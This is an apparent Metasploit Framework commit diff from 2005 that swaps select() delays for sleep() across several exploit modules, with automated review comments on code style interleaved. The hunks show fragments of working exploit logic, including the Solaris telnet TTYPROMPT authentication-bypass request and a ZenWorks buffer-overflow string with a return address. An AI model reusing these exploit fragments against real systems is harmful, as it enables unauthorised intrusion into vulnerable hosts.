From 3fa5d999a231cc959036186a99bfcddbe20d9e08 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 27 Dec 2005 04:40:06 +0000 Subject: [PATCH] No more select(nil, nil, nil, X) git-svn-id: file:///home/svn/incoming/trunk@3259 4d416f70-5f16-0410-b530-b9f4589650da --- lib/rex/constants.rb | 3 ++- modules/exploits/solaris/telnet/solaris_ttyprompt.rb | 7 +++++++ modules/exploits/windows/backupexec/name_service.rb | 2 +- modules/exploits/windows/brightstor/universal_agent.rb | 2 +- modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb | 4 ++-- modules/exploits/windows/imap/mdaemon_cram_md5.rb | 2 +- modules/exploits/windows/isapi/fp30reg_chunked.rb | 2 +- modules/exploits/windows/novell/zenworks_desktop_agent.rb | 2 +- 8 files changed, 16 insertions(+), 8 deletions(-) diff --git a/lib/rex/constants.rb b/lib/rex/constants.rb index b6afb5a6ae..06207ff197 100644 --- a/lib/rex/constants.rb +++ b/lib/rex/constants.rb @@ -75,7 +75,6 @@ ARCH_TYPES = ARCH_PPC, ARCH_SPARC ] -ARCH_ALL = ARCH_TYPES ARCH_CMD_UNIX = 'cmd_unix' @@ -87,3 +86,5 @@ ARCH_CMD = ARCH_CMD_LINUX, ARCH_CMD_BSD ] + +ARCH_ALL = ARCH_TYPES + ARCH_CMD diff --git a/modules/exploits/solaris/telnet/solaris_ttyprompt.rb b/modules/exploits/solaris/telnet/solaris_ttyprompt.rb index 6d39923360..205fdc5383 100644 --- a/modules/exploits/solaris/telnet/solaris_ttyprompt.rb +++ b/modules/exploits/solaris/telnet/solaris_ttyprompt.rb @@ -29,6 +29,8 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote { 'Space' => 2000, 'BadChars' => "", + 'MinNops' => 0, + 'MaxNops' => 0, }, 'PayloadCompat' => { @@ -51,6 +53,9 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote def exploit connect + banner = sock.get_once + + p banner print_status("Setting TTYPROMPT...") req = 
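Review bot: `ARCH_ALL = ARCH_TYPES + ARCH_CMD`, added at the end of lib/rex/constants.rb, changes what the constant means, and neither the commit subject nor a comment says so. The first hunk removes `ARCH_ALL = ARCH_TYPES`, so until now the name covered only the CPU list; any caller that reads it as "every native architecture" will now also match the `cmd_*` entries. Those call sites are not visible in this patch and are worth checking. A comment above the definition, such as `# Every architecture, including the command-interpreter pseudo-architectures`, would record the intent. If nothing appends to the list at runtime, `(ARCH_TYPES + ARCH_CMD).freeze` would keep it from being mutated by accident.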
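Review bot: `p banner` in `exploit` (second hunk of solaris_ttyprompt.rb) looks like a leftover debugging line: it writes straight to the process's stdout instead of going through `print_status`, which the very next line uses. `sock.get_once` presumably returns nil when nothing arrives in time, in which case this prints a bare `nil`. Either drop the two added lines or report the banner through the framework, for example `print_status("Banner: #{banner.inspect}") if banner`, where `inspect` keeps control bytes sent by the remote side from reaching the terminal raw. The body of `exploit` continues outside the hunk.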
@@ -69,10 +74,12 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote "\xff\xf0" sock.put(req) + sleep(0.25) print_status("Sending username with 65 environment variables...") sock.put(datastore['USER'] + (" M" * 65) + "\n") sock.put(payload.encoded) + sleep(0.25) handler disconnect diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 9120619ae9..13cc45071b 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -100,7 +100,7 @@ class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote sock.put(payload.encoded) print_status("Waiting for the payload to execute...") - select(nil, nil, nil, 2) + sleep(2) handler disconnect diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index 936056aa6f..73c350aca5 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -110,7 +110,7 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp disconnect # Give the process time to recover from each exception - select(nil, nil, nil, 0.1); + sleep(0.1); } handler diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 25528f61c7..a066329818 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -140,7 +140,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote end 1.upto(8) { |i| - select(nil, nil, nil, 0.25) + sleep(0.25) return if self.session_created? } } 
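Review bot: The two `sleep(0.25)` calls added after `sock.put(req)` and after `sock.put(payload.encoded)` are new delays, not replacements of an existing `select(nil, nil, nil, X)`, so they go beyond what the commit subject describes and carry no explanation. A short comment on each saying what the pause is for and whether 0.25 was measured or guessed would let the next maintainer change it with confidence. Together with the banner read and the `MinNops`/`MaxNops` options in the earlier hunks of this file, this reads as a separate behavioural change that would be easier to review and revert as its own commit. `exploit` starts outside this hunk.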
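Review bot: The replacement line `sleep(0.1);` in brightstor/universal_agent.rb keeps the trailing semicolon from the old `select` call; Ruby does not need it, and every other module touched by this patch writes the call without one. `sleep(0.1)` is the consistent form. The enclosing block opens outside the hunk.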
@@ -155,7 +155,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote connect rescue => e print_status("Connection failed (#{i.to_s}/20)...") - select(nil, nil, nil, 2) + sleep(2) next end return sock diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 342ca33bb3..ad1c7c3a2a 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -67,7 +67,7 @@ class Exploits::Windows::Imap::MDaemonImapCramMD5Overflow < Msf::Exploit::Remote res = sock.get_once print_status("Received LOGOUT reply: #{res.chomp}") - select(nil, nil, nil, 1) + sleep(1) handler disconnect diff --git a/modules/exploits/windows/isapi/fp30reg_chunked.rb b/modules/exploits/windows/isapi/fp30reg_chunked.rb index 434c42ca63..e522919db7 100644 --- a/modules/exploits/windows/isapi/fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/fp30reg_chunked.rb @@ -83,7 +83,7 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote "0\r\n" s.put(req) - select(nil, nil, nil, 1) + sleep(1) handler disconnect diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index 652b2d5fd5..045d504e87 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -73,7 +73,7 @@ class Exploits::Windows::Novell::ZenworksDesktopAgentOverflow < Msf::Exploit::Re sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V')) print_status("Overflow request sent, sleeping for four seconds") - select(nil, nil, nil, 4) + sleep(4) handler disconnect
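Review bot: In zenworks_desktop_agent.rb the delay is now stated twice, in words in `print_status("Overflow request sent, sleeping for four seconds")` and as the literal in `sleep(4)`, so the message goes stale as soon as someone edits the number. Holding the value in one local keeps the two in step: `delay = 4`, then `print_status("Overflow request sent, sleeping for #{delay} seconds")` and `sleep(delay)`. The enclosing method starts outside the hunk.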